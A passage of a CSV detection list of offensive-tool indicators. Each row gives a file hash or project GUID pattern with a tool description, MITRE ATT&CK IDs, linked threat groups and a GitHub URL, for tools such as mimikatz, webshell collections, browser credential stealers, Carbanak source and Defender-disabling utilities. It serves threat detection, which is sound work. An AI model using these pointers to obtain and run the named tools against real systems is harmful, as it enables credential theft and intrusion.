INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40207"
"*db2_default_user.txt*",".{0,1000}db2_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40208"
"*DB234158-233E-4EC4-A2CE-EF02699563A2*",".{0,1000}DB234158\-233E\-4EC4\-A2CE\-EF02699563A2.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","40210"
"*db2959484aa1ca726c7147977736455908ae0c912bd96278a3c40723fe8b6e38*",".{0,1000}db2959484aa1ca726c7147977736455908ae0c912bd96278a3c40723fe8b6e38.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40211"
"*db2b4e0e013a0302f6ebe82935a1e416b6672dd447030c194c638585525c3354*",".{0,1000}db2b4e0e013a0302f6ebe82935a1e416b6672dd447030c194c638585525c3354.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40213"
"*db2c660c7cdfb86957e95790e3bef0a7ebf7fc1b1d7e48b14cbf70210ca87210*",".{0,1000}db2c660c7cdfb86957e95790e3bef0a7ebf7fc1b1d7e48b14cbf70210ca87210.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40214"
"*db316e36b24cc4e62eacabee4b9f4704fea5880a9e31508796b3b48c0a9911ca*",".{0,1000}db316e36b24cc4e62eacabee4b9f4704fea5880a9e31508796b3b48c0a9911ca.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40216"
"*db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5*",".{0,1000}db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40217"
"*db32c7cf222148bc4d2d52055355a3b82cb10eb8d8b0cd058a9c9d5e34f00adf*",".{0,1000}db32c7cf222148bc4d2d52055355a3b82cb10eb8d8b0cd058a9c9d5e34f00adf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40218"
"*db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca*",".{0,1000}db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40220"
"*db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca*",".{0,1000}db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40221"
"*db3bd2d5d62c49cf1b49ff0cd04a11da4e21006acb72bb193b776d1abaddb8a9*",".{0,1000}db3bd2d5d62c49cf1b49ff0cd04a11da4e21006acb72bb193b776d1abaddb8a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40223"
"*db40433bbaa08ed43bfaf5d3535372a95c7c10a5803bd9e1ec95157bb65ce6bd*",".{0,1000}db40433bbaa08ed43bfaf5d3535372a95c7c10a5803bd9e1ec95157bb65ce6bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40224"
"*db486e0cb94cf2bbe38173b7ce0eb02731ad9a435a04899a03d57b06cecddc4d*",".{0,1000}db486e0cb94cf2bbe38173b7ce0eb02731ad9a435a04899a03d57b06cecddc4d.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","40225"
"*db5670eac95bc3149f2cddd7cfe41b2bb35b6e8af8f101c86a68e8da6d2e02ff*",".{0,1000}db5670eac95bc3149f2cddd7cfe41b2bb35b6e8af8f101c86a68e8da6d2e02ff.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40227"
"*db5703e3f81ef1ebcff2242d0df019c926107d4d062617a76623d6e196285539*",".{0,1000}db5703e3f81ef1ebcff2242d0df019c926107d4d062617a76623d6e196285539.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40228"
"*db57df98645168a3896d882401bf1730ab0d5fe6821434503d3630d68c887893*",".{0,1000}db57df98645168a3896d882401bf1730ab0d5fe6821434503d3630d68c887893.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40229"
"*db5a054172dcde3aebfb86b08e3bf8992f9df3d22e2028fd5154c647e7361ceb*",".{0,1000}db5a054172dcde3aebfb86b08e3bf8992f9df3d22e2028fd5154c647e7361ceb.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#filehash","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","40230"
"*db5b21d5a66fadcebe25ed1bcac0cd5590a3afdf1e9d247a3d169ffcd0a78e62*",".{0,1000}db5b21d5a66fadcebe25ed1bcac0cd5590a3afdf1e9d247a3d169ffcd0a78e62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40231"
"*db5edbf21647b80f858790642c32e9c41884339b505d62ceebcfabb74a44db15*",".{0,1000}db5edbf21647b80f858790642c32e9c41884339b505d62ceebcfabb74a44db15.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","40234"
"*db61c38755146ab83aa010beac56737f1f1efd74c61ebbb1876173e29fd1a2b8*",".{0,1000}db61c38755146ab83aa010beac56737f1f1efd74c61ebbb1876173e29fd1a2b8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40235"
"*DB62BB65-0E29-4E95-BD4E-0AA543EF74B5*",".{0,1000}DB62BB65\-0E29\-4E95\-BD4E\-0AA543EF74B5.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#GUIDProject","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","40236"
"*db62ef03d6be4778d3ec0fd2f6cb2cf030f02a70efa1f30850b27e0cefd50e9e*",".{0,1000}db62ef03d6be4778d3ec0fd2f6cb2cf030f02a70efa1f30850b27e0cefd50e9e.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#filehash","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","40237"
"*db65c744d5de72d0e727cf670e992aeec6e4e195298e71f22c095eb63df4f923*",".{0,1000}db65c744d5de72d0e727cf670e992aeec6e4e195298e71f22c095eb63df4f923.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40238"
"*db6749f21079d875bf04af8c1eef3e2e8e2972818273c3032bd8c843f2d72cda*",".{0,1000}db6749f21079d875bf04af8c1eef3e2e8e2972818273c3032bd8c843f2d72cda.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","40239"
"*db7c237e7fe7b5bed6b1d63082f21810eb2f0defdf2663de2e7871bb6f24472d*",".{0,1000}db7c237e7fe7b5bed6b1d63082f21810eb2f0defdf2663de2e7871bb6f24472d.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40244"
"*db7c868e3042fbf2138bf10e7dae3fb72f38a269a6337e87669829a416aa3109*",".{0,1000}db7c868e3042fbf2138bf10e7dae3fb72f38a269a6337e87669829a416aa3109.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","40245"
"*db7d3e12a58a102b76c1f6e041d0a464ccbffc346dbc338a8cb4a7e5ec508b6c*",".{0,1000}db7d3e12a58a102b76c1f6e041d0a464ccbffc346dbc338a8cb4a7e5ec508b6c.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","#filehash","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","40246"
"*db81283e76c7ae80f00ecdedf6f46d92a8825b44819bac05c02bd64200a8a596*",".{0,1000}db81283e76c7ae80f00ecdedf6f46d92a8825b44819bac05c02bd64200a8a596.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40248"
"*db85afa956f0a0b6ec30c13259782a0759a5adb2f5dc01969068bb4137364d15*",".{0,1000}db85afa956f0a0b6ec30c13259782a0759a5adb2f5dc01969068bb4137364d15.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40249"
"*DB8A345D-E19C-4C2A-9FDF-16BF4DD03717*",".{0,1000}DB8A345D\-E19C\-4C2A\-9FDF\-16BF4DD03717.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#GUIDproject","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","40250"
"*db8b7152534b483ed966cd9557bed083106b448feea5e06d6963c0bd7b282f40*",".{0,1000}db8b7152534b483ed966cd9557bed083106b448feea5e06d6963c0bd7b282f40.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40251"
"*db8d2fb1a43cab677fc796f9a67f37db52bde8a8778db7489903baad1b7ad29b*",".{0,1000}db8d2fb1a43cab677fc796f9a67f37db52bde8a8778db7489903baad1b7ad29b.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","40252"
"*db9b4df43af0a73b96453a0e6967720e794884f48abc60d3d8743309c3ae759b*",".{0,1000}db9b4df43af0a73b96453a0e6967720e794884f48abc60d3d8743309c3ae759b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","40254"
"*db9e318fce9098eb3ae55a782aee7f29667772302296b4e4924e0edb88e69560*",".{0,1000}db9e318fce9098eb3ae55a782aee7f29667772302296b4e4924e0edb88e69560.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40256"
"*dba60efb94e99af6e6e52c487919380d59b6071b310f30ee0f29f50365c84f6d*",".{0,1000}dba60efb94e99af6e6e52c487919380d59b6071b310f30ee0f29f50365c84f6d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40258"
"*DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A*",".{0,1000}DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","40260"
"*DBAE6A6E-AE23-4DE9-9AB2-6A8D2CD59DEF*",".{0,1000}DBAE6A6E\-AE23\-4DE9\-9AB2\-6A8D2CD59DEF.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#GUIDproject","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40261"
"*dbb049e7216149b1723b7dbbf9e3e80ce4a0f2d78b2afa8b2cf451c1e5d97b91*",".{0,1000}dbb049e7216149b1723b7dbbf9e3e80ce4a0f2d78b2afa8b2cf451c1e5d97b91.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#filehash","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","40262"
"*dbb0f54089c689de684d365df493caae0d20771d4e486060087eaab5fd3f679e*",".{0,1000}dbb0f54089c689de684d365df493caae0d20771d4e486060087eaab5fd3f679e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40263"
"*dbbd6ee60a97e1647bf373b985b153cb8b19ab0f9809bf4eceae5d565e6edb02*",".{0,1000}dbbd6ee60a97e1647bf373b985b153cb8b19ab0f9809bf4eceae5d565e6edb02.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","40264"
"*dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24*",".{0,1000}dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40265"
